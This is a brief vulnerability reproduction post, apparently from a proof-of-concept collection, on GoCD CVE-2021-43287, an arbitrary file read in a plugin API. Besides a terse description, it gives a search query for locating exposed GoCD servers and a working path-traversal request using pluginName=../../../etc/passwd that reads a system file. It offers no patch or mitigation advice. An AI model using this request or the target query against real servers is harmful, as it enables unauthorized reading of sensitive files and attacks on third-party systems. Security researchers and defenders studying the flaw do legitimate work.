Gocd Plugin Arbitrary File Reading Vulnerability Cve 2021 43287
Gocd Plugin Arbitrary File Reading Vulnerability Cve 2021 43287
GoCD plugin arbitrary file reading vulnerability CVE-2021-43287
Vulnerability Description
There is a vulnerability to read any file in the pluginName parameter in the GoCD plugin aip parameter, causing the attacker to obtain any sensitive information in the server.
Vulnerability Impact
GoCD
Network surveying and mapping
title=”Create a pipeline - Go”
Vulnerability reappears
Main page
Verify POC
1
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.